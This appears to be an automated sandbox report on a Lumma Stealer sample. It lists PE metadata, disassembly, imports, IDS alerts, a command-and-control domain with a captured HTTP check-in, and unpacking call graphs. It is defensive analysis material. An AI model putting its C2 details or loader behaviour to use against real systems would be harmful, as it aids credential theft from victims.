                                SHA512:8cd3fb7c6ea134db288a04e724c8a260a5ee55bdee7ce31b62a6625659761543cc94e5264330622ebea910bbf6021793fb3f7043d8020e24ab7cee55c4b08337
                                SSDEEP:6144:SPZeoGEbIpQOyD4jAfvG5skPwuQp0IcTwdC:SP8oGEEpQ9D4jAfeskIuIkwg
                                TLSH:D474D021FAF29121E7B74AB575B19AA4193FBC73AE37918E3214125F2D31381CD6270B
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#......6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L....x.d...........
                                Icon Hash:351a111112911209
                                Entrypoint:0x401a04
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x64997888 [Mon Jun 26 11:37:44 2023 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:17fedc67c91a23016ced8a879a1b9a8c
                                Instruction
                                call 00007FD73D1B0475h
                                jmp 00007FD73D1AC70Dh
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                sub esp, 00000328h
                                mov dword ptr [00446C18h], eax
                                mov dword ptr [00446C14h], ecx
                                mov dword ptr [00446C10h], edx
                                mov dword ptr [00446C0Ch], ebx
                                mov dword ptr [00446C08h], esi
                                mov dword ptr [00446C04h], edi
                                mov word ptr [00446C30h], ss
                                mov word ptr [00446C24h], cs
                                mov word ptr [00446C00h], ds
                                mov word ptr [00446BFCh], es
                                mov word ptr [00446BF8h], fs
                                mov word ptr [00446BF4h], gs
                                pushfd
                                pop dword ptr [00446C28h]
                                mov eax, dword ptr [ebp+00h]
                                mov dword ptr [00446C1Ch], eax
                                mov eax, dword ptr [ebp+04h]
                                mov dword ptr [00446C20h], eax
                                lea eax, dword ptr [ebp+08h]
                                mov dword ptr [00446C2Ch], eax
                                mov eax, dword ptr [ebp-00000320h]
                                mov dword ptr [00446B68h], 00010001h
                                mov eax, dword ptr [00446C20h]
                                mov dword ptr [00446B1Ch], eax
                                mov dword ptr [00446B10h], C0000409h
                                mov dword ptr [00446B14h], 00000001h
                                mov eax, dword ptr [00444004h]
                                mov dword ptr [ebp-00000328h], eax
                                mov eax, dword ptr [00444008h]
                                mov dword ptr [ebp-00000324h], eax
                                call dword ptr [000000BCh]
                                Programming Language:
                                • [C++] VS2008 build 21022
                                • [ASM] VS2008 build 21022
                                • [ C ] VS2008 build 21022
                                • [IMP] VS2005 build 50727
                                • [RES] VS2008 build 21022
                                • [LNK] VS2008 build 21022
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x428fc0x3c.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4210000x112f0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x410000x190.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x3f47c0x3f60081f67c957dffb68aa18b2390c4d08e45False0.8031465729783037data7.3670968220770385IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x410000x21ee0x2200243af81982e493ae9711b65a3dbae29dFalse0.3678768382352941data5.5683342578854536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x440000x3dc49c0x700045fecda687c0b1fff4f34279483a13e1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x4210000x112f00x11400925288d43d065c9d19ace90102ba0e7aFalse0.4494735054347826data4.754779451185743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x4215e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.5101279317697228
                                RT_ICON0x4224880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.5658844765342961
                                RT_ICON0x422d300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.6002304147465438
                                RT_ICON0x4233f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.6394508670520231
                                RT_ICON0x4239600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.4099585062240664
                                RT_ICON0x425f080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4793621013133208
                                RT_ICON0x426fb00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.47704918032786886
                                RT_ICON0x4279380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5806737588652482
                                RT_ICON0x427e180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.3427505330490405
                                RT_ICON0x428cc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.47021660649819497
                                RT_ICON0x4295680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5040322580645161
                                RT_ICON0x429c300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.5289017341040463
                                RT_ICON0x42a1980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkmenTurkmenistan0.42406639004149377
                                RT_ICON0x42c7400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.4324577861163227
                                RT_ICON0x42d7e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.43565573770491806
                                RT_ICON0x42e1700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.450354609929078
                                RT_STRING0x42e8080x386data0.4567627494456763
                                RT_STRING0x42eb900xb2data0.601123595505618
                                RT_STRING0x42ec480x6d0data0.4288990825688073
                                RT_STRING0x42f3180x71edata0.4313940724478595
                                RT_STRING0x42fa380x6e2data0.43473325766174803
                                RT_STRING0x4301200x65cdata0.43611793611793614
                                RT_STRING0x4307800x71adata0.4251925192519252
                                RT_STRING0x430ea00x7c8data0.41967871485943775
                                RT_STRING0x4316680x756data0.4222577209797657
                                RT_STRING0x431dc00x52edata0.4517345399698341
                                RT_GROUP_ICON0x42e5d80x76dataTurkmenTurkmenistan0.6694915254237288
                                RT_GROUP_ICON0x427da00x76dataTurkmenTurkmenistan0.6610169491525424
                                RT_VERSION0x42e6500x1b4data0.5688073394495413
                                DLLImport
                                KERNEL32.dllSetDefaultCommConfigA, SearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, EndUpdateResourceA, GetVersionExA, FindFirstVolumeW, UnregisterWaitEx, HeapAlloc, MultiByteToWideChar, GetLastError, HeapReAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                USER32.dllGetProcessDefaultLayout
                                Language of compilation systemCountry where language is spokenMap
                                TurkmenTurkmenistan
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-12-18T15:53:25.027569+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.8600531.1.1.153UDP
                                2024-12-18T15:53:26.831721+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.849704172.67.197.170443TCP
                                2024-12-18T15:53:26.831721+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849704172.67.197.170443TCP
                                2024-12-18T15:53:32.458508+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849704172.67.197.170443TCP
                                2024-12-18T15:53:32.458508+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849704172.67.197.170443TCP
                                2024-12-18T15:53:32.953805+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.849705172.67.197.170443TCP
                                2024-12-18T15:53:32.953805+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705172.67.197.170443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 18, 2024 15:53:25.603998899 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:25.604059935 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:25.604263067 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:25.607424021 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:25.607438087 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:26.831602097 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:26.831721067 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:26.837977886 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:26.838002920 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:26.838257074 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:26.890772104 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:26.892966986 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:26.892966986 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:26.893127918 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.458528996 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.458616018 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.458682060 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.460817099 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.460839033 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.460854053 CET49704443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.460861921 CET44349704172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.469858885 CET49705443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.469913006 CET44349705172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.470025063 CET49705443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.470300913 CET49705443192.168.2.8172.67.197.170
                                Dec 18, 2024 15:53:32.470314026 CET44349705172.67.197.170192.168.2.8
                                Dec 18, 2024 15:53:32.953804970 CET49705443192.168.2.8172.67.197.170
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 18, 2024 15:53:25.027569056 CET6005353192.168.2.81.1.1.1
                                Dec 18, 2024 15:53:25.598294973 CET53600531.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 18, 2024 15:53:25.027569056 CET192.168.2.81.1.1.10x2c5fStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 18, 2024 15:53:25.598294973 CET1.1.1.1192.168.2.80x2c5fNo error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false
                                Dec 18, 2024 15:53:25.598294973 CET1.1.1.1192.168.2.80x2c5fNo error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                • discokeyus.lat
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849704172.67.197.1704435608C:\Users\user\Desktop\iOnDpwrkWY.exe
                                TimestampBytes transferredDirectionData
                                2024-12-18 14:53:26 UTC261OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 8
                                Host: discokeyus.lat
                                2024-12-18 14:53:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                Data Ascii: act=life
                                2024-12-18 14:53:32 UTC1037INHTTP/1.1 200 OK
                                Date: Wed, 18 Dec 2024 14:53:32 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=3uer8kjnpjit0lijfnvp9p28l3; expires=Sun, 13-Apr-2025 08:40:07 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                cf-cache-status: DYNAMIC
                                vary: accept-encoding
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRn8cugj5rA%2Fe72crXV8DrG7ghW2ojVZncyM0oPv7xoJ%2FmcOKISKICZElMgpjlnGzGSescOZIETh8CIxNQFTrK3XIOvWvk4G8wf5BJH3lg%2BvVHeKoF5ZjdijRsxxw3etdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8f3ffb84689bf5f7-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1602&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1822721&cwnd=237&unsent_bytes=0&cid=6787265bb94ac19c&ts=5639&x=0"
                                2024-12-18 14:53:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                Data Ascii: 2ok
                                2024-12-18 14:53:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:09:53:21
                                Start date:18/12/2024
                                Path:C:\Users\user\Desktop\iOnDpwrkWY.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\iOnDpwrkWY.exe"
                                Imagebase:0x400000
                                File size:368'640 bytes
                                MD5 hash:019DF8734CD00261A66F10E3A4F697DA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:09:53:32
                                Start date:18/12/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1660
                                Imagebase:0xe90000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:1.8%
                                  Dynamic/Decrypted Code Coverage:40.5%
                                  Signature Coverage:36.5%
                                  Total number of Nodes:74
                                  Total number of Limit Nodes:5
                                  execution_graph 26116 43aa80 26119 43d810 26116->26119 26118 43aa8a RtlAllocateHeap 26120 43d830 26119->26120 26120->26118 26120->26120 26121 40c583 CoInitializeSecurity 26122 9f003c 26123 9f0049 26122->26123 26137 9f0e0f SetErrorMode SetErrorMode 26123->26137 26128 9f0265 26129 9f02ce VirtualProtect 26128->26129 26131 9f030b 26129->26131 26130 9f0439 VirtualFree 26132 9f04be 26130->26132 26133 9f05f4 LoadLibraryA 26130->26133 26131->26130 26132->26133 26134 9f04e3 LoadLibraryA 26132->26134 26136 9f08c7 26133->26136 26134->26132 26138 9f0223 26137->26138 26139 9f0d90 26138->26139 26140 9f0dad 26139->26140 26141 9f0dbb GetPEB 26140->26141 26142 9f0238 VirtualAlloc 26140->26142 26141->26142 26142->26128 26143 43aaa0 26144 43aac4 26143->26144 26145 43aab3 26143->26145 26146 43aab8 RtlFreeHeap 26145->26146 26146->26144 26147 43c767 26149 43c790 26147->26149 26148 43c80e 26149->26148 26151 43c1f0 LdrInitializeThunk 26149->26151 26151->26148 26152 43cce6 26153 43cd00 26152->26153 26154 43cd6e 26153->26154 26159 43c1f0 LdrInitializeThunk 26153->26159 26158 43c1f0 LdrInitializeThunk 26154->26158 26157 43ce4d 26158->26157 26159->26154 26160 43c58a 26162 43c460 26160->26162 26161 43c5f4 26162->26161 26165 43c1f0 LdrInitializeThunk 26162->26165 26164 43c54d 26165->26164 26166 43c2c8 26167 43c2e0 26166->26167 26167->26167 26168 43ccaf GetForegroundWindow 26167->26168 26169 43ccbe 26168->26169 26170 af9004 26171 af9071 26170->26171 26174 af9816 26171->26174 26175 af9825 26174->26175 26178 af9fb6 26175->26178 26179 af9fd1 26178->26179 26180 af9fda CreateToolhelp32Snapshot 26179->26180 26181 af9ff6 Module32First 26179->26181 26180->26179 26180->26181 26182 afa005 26181->26182 26184 af9815 26181->26184 26185 af9c75 26182->26185 26186 af9ca0 26185->26186 26187 af9ce9 26186->26187 26188 af9cb1 VirtualAlloc 26186->26188 26187->26187 26188->26187 26189 408850 26191 40885f 26189->26191 26190 408acf ExitProcess 26191->26190 26192 40891c GetCurrentProcessId GetCurrentThreadId 26191->26192 26195 408ab3 26191->26195 26193 408941 26192->26193 26194 408945 SHGetSpecialFolderPathW GetForegroundWindow 26192->26194 26193->26194 26196 408a3d 26194->26196 26195->26190 26196->26195 26198 40c550 CoInitializeEx 26196->26198 26199 43e7d0 26200 43e800 26199->26200 26203 43e87f 26200->26203 26205 43c1f0 LdrInitializeThunk 26200->26205 26201 43e94e 26203->26201 26206 43c1f0 LdrInitializeThunk 26203->26206 26205->26203 26206->26201 26212 40e71a CoUninitialize CoUninitialize

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                  • GetCurrentThreadId.KERNEL32 ref: 00408925
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                  • GetForegroundWindow.USER32 ref: 00408A33
                                    • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                    • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                    • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                  • ExitProcess.KERNEL32 ref: 00408AD1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                  • String ID:
                                  • API String ID: 3072701918-0
                                  • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                  • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                  • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                  • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 216 af9fb6-af9fcf 217 af9fd1-af9fd3 216->217 218 af9fda-af9fe6 CreateToolhelp32Snapshot 217->218 219 af9fd5 217->219 220 af9fe8-af9fee 218->220 221 af9ff6-afa003 Module32First 218->221 219->218 220->221 226 af9ff0-af9ff4 220->226 222 afa00c-afa014 221->222 223 afa005-afa006 call af9c75 221->223 227 afa00b 223->227 226->217 226->221 227->222
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AF9FDE
                                  • Module32First.KERNEL32(00000000,00000224), ref: 00AF9FFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_af9000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3833638111-0
                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction ID: 03b362eaa5bc82ebe12e820efe5214a138a326eb4c9564ae3ea1b45e7aa5df77
                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction Fuzzy Hash: 9FF04932600719ABD7202BE9A98DBBBB6E8AF59725F100629F747D1480DA70E8458A61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 241 43c1f0-43c222 LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,+*)
                                  • API String ID: 0-3529585375
                                  • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                  • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                  • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                  • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 9f003c-9f0047 1 9f004c-9f0263 call 9f0a3f call 9f0e0f call 9f0d90 VirtualAlloc 0->1 2 9f0049 0->2 17 9f028b-9f0292 1->17 18 9f0265-9f0289 call 9f0a69 1->18 2->1 20 9f02a1-9f02b0 17->20 22 9f02ce-9f03c2 VirtualProtect call 9f0cce call 9f0ce7 18->22 20->22 23 9f02b2-9f02cc 20->23 29 9f03d1-9f03e0 22->29 23->20 30 9f0439-9f04b8 VirtualFree 29->30 31 9f03e2-9f0437 call 9f0ce7 29->31 33 9f04be-9f04cd 30->33 34 9f05f4-9f05fe 30->34 31->29 36 9f04d3-9f04dd 33->36 37 9f077f-9f0789 34->37 38 9f0604-9f060d 34->38 36->34 42 9f04e3-9f0505 LoadLibraryA 36->42 40 9f078b-9f07a3 37->40 41 9f07a6-9f07b0 37->41 38->37 43 9f0613-9f0637 38->43 40->41 44 9f086e-9f08be LoadLibraryA 41->44 45 9f07b6-9f07cb 41->45 46 9f0517-9f0520 42->46 47 9f0507-9f0515 42->47 48 9f063e-9f0648 43->48 52 9f08c7-9f08f9 44->52 49 9f07d2-9f07d5 45->49 50 9f0526-9f0547 46->50 47->50 48->37 51 9f064e-9f065a 48->51 53 9f07d7-9f07e0 49->53 54 9f0824-9f0833 49->54 55 9f054d-9f0550 50->55 51->37 56 9f0660-9f066a 51->56 59 9f08fb-9f0901 52->59 60 9f0902-9f091d 52->60 61 9f07e4-9f0822 53->61 62 9f07e2 53->62 58 9f0839-9f083c 54->58 63 9f0556-9f056b 55->63 64 9f05e0-9f05ef 55->64 57 9f067a-9f0689 56->57 67 9f068f-9f06b2 57->67 68 9f0750-9f077a 57->68 58->44 69 9f083e-9f0847 58->69 59->60 61->49 62->54 65 9f056f-9f057a 63->65 66 9f056d 63->66 64->36 70 9f057c-9f0599 65->70 71 9f059b-9f05bb 65->71 66->64 72 9f06ef-9f06fc 67->72 73 9f06b4-9f06ed 67->73 68->48 74 9f084b-9f086c 69->74 75 9f0849 69->75 83 9f05bd-9f05db 70->83 71->83 77 9f06fe-9f0748 72->77 78 9f074b 72->78 73->72 74->58 75->44 77->78 78->57 83->55
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009F024D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: cess$kernel32.dll
                                  • API String ID: 4275171209-1230238691
                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction ID: 61c0beff9345d4d30c43a6aeac312f58f61807735dea6f5abac8b0ba57647213
                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction Fuzzy Hash: B7526874A01229DFDB64CF58C984BACBBB5BF49304F1480D9E94DAB252DB30AE85DF14

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
